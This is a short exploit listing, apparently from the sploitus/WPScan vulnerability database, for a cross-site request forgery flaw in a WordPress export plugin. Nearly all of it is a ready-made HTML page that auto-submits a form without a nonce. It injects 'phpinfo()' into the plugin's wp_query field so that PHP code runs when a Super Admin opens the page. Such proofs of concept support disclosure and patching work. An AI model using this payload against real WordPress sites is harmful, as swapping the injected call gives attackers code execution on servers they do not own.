Share
## https://sploitus.com/exploit?id=WPEX-ID:72BE4B5C-21BE-46AF-A3F4-08B4C190A7E2
Submit the following form as a Super Admin (notice that it does not contain a nonce). Despite the error, visit `/wp-admin/admin.php?page=pmxe-admin-export&action=template` to see the output of `phpinfo()`.

<html>
  <body>
    <form action="https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=pmxe-admin-export" method="POST">
      <input type="hidden" name="export_type" value="advanced" />
      <input type="hidden" name="wp_query_selector" value="wp_query" />
      <input type="hidden" name="wp_query" value="phpinfo()" />
      <input type="hidden" name="is_submitted" value="1" />
      <input type="hidden" name="auto_generate" value="0" />
      <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=pmxe-admin-export" />
      <input type="submit" value="Submit request" />
    </form>
    <script>document.getElementsByTagName('form')[0].submit()</script>
  </body>
</html>